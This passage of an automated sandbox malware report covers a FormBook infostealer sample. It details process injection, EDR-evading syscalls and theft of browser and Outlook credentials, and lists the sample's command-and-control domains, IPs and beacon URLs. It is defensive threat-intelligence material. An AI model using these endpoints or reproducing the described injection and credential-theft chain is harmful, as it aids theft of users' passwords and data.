                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 4884Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"Jump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: PcwrDoOfOMD.exe, 00000007.00000002.3257290122.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000000.2019558831.0000000001880000.00000002.00000001.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167558612.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Users\user\Desktop\ORDER-401.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574061 Sample: ORDER-401.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 30 www.070001325.xyz 2->30 32 www.397256.pink 2->32 34 9 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 6 other signatures 2->52 10 ORDER-401.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\AppData\...\ORDER-401.exe.log, ASCII 10->28 dropped 13 ORDER-401.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 PcwrDoOfOMD.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 tzutil.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 PcwrDoOfOMD.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 all.wjscdn.com 154.205.159.116, 49727, 49728, 49729 IKGUL-26484US Seychelles 22->36 38 likesharecomment.net 3.33.130.190, 49731, 49732, 49733 AMAZONEXPANSIONGB United States 22->38 40 4 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ORDER-401.exe68%ReversingLabsWin32.Backdoor.FormBook
                ORDER-401.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe
                http://www.likesharecomment.net/nqht/0%Avira URL Cloudsafe
                http://www.learnwithus.site/a6qk/0%Avira URL Cloudsafe
                http://www.jijievo.site/ao44/0%Avira URL Cloudsafe
                http://www.elderscrolls.com/skyrim/characterK0%Avira URL Cloudsafe
                http://www.likesharecomment.net/nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU0%Avira URL Cloudsafe
                http://www.jijievo.site/ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU0%Avira URL Cloudsafe
                http://www.likesharecomment.net0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU100%Avira URL Cloudmalware
                http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware
                http://www.070001325.xyz/gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ==0%Avira URL Cloudsafe
                https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU100%Avira URL Cloudmalware
                https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.expancz.top
                		107.155.56.30
                		truefalse
                  		high
                  www.learnwithus.site
                  		209.74.77.107
                  		truefalse
                    		high
                    all.wjscdn.com
                    		154.205.159.116
                    		truetrue
                      		unknown
                      dns.ladipage.com
                      		18.139.62.226
                      		truefalse
                        		high
                        www.397256.pink
                        		38.46.13.54
                        		truetrue
                          		unknown
                          www.070001325.xyz
                          		161.97.142.144
                          		truefalse
                            		high
                            likesharecomment.net
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.epitomize.shop
                              		unknown
                              		unknownfalse
                                		unknown
                                www.taxiquynhonnew.click
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.jijievo.site
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.likesharecomment.net
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.jijievo.site/ao44/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.likesharecomment.net/nqht/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.likesharecomment.net/nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JUtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.learnwithus.site/a6qk/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JUtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.070001325.xyz/gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ==true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.taxiquynhonnew.click/y49d/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.jijievo.site/ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JUtrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabtzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://s.yimg.com/wi/ytc.jstzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.elderscrolls.com/skyrim/characterTORDER-401.exefalse
                                                      		high
                                                      https://www.ecosia.org/newtab/tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.elderscrolls.com/skyrim/characterKORDER-401.exefalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.elderscrolls.com/skyrim/playerORDER-401.exefalse
                                                            		high
                                                            https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.likesharecomment.netPcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dq0ib5xlct7tw.cloudfront.net/PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUtzutil.exe, 00000008.00000002.3259176877.0000000003E98000.00000004.10000000.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000003108000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  161.97.142.144
                                                                  		www.070001325.xyzUnited States
                                                                  		51167CONTABODEfalse
                                                                  209.74.77.107
                                                                  		www.learnwithus.siteUnited States
                                                                  		31744MULTIBAND-NEWHOPEUSfalse
                                                                  18.139.62.226
                                                                  		dns.ladipage.comUnited States
                                                                  		16509AMAZON-02USfalse
                                                                  154.205.159.116
                                                                  		all.wjscdn.comSeychelles
                                                                  		26484IKGUL-26484UStrue
                                                                  107.155.56.30
                                                                  		www.expancz.topUnited States
                                                                  		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse
                                                                  3.33.130.190
                                                                  		likesharecomment.netUnited States
                                                                  		8987AMAZONEXPANSIONGBtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1574061
                                                                  Start date and time:2024-12-12 21:35:51 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 58s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:ORDER-401.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@11/6
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 169
                                                                  • Number of non-executed functions: 292
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target PcwrDoOfOMD.exe, PID 6036 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • VT rate limit hit for: ORDER-401.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  161.97.142.144SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.070001813.xyz/gn0y/
                                                                  PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                  • www.070002018.xyz/6m2n/
                                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.070002018.xyz/6m2n/
                                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002613.xyz/xd9h/
                                                                  Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.030002449.xyz/cfqm/
                                                                  PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                  • www.070001955.xyz/7zj0/
                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.54248711.xyz/jm2l/
                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.030002613.xyz/xd9h/
                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                  • www.070002018.xyz/6m2n/
                                                                  209.74.77.107PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                  • www.beyondfitness.live/fbpt/
                                                                  DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                  • www.happyjam.life/4ii9/
                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                  • www.liveplah.live/2bf0/
                                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gadgetre.info/8q8w/
                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                  • www.learnwithus.site/alu5/
                                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                  • www.learnwithus.site/alu5/
                                                                  SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                  • www.happyjam.life/4ii9/
                                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gadgetre.info/8q8w/
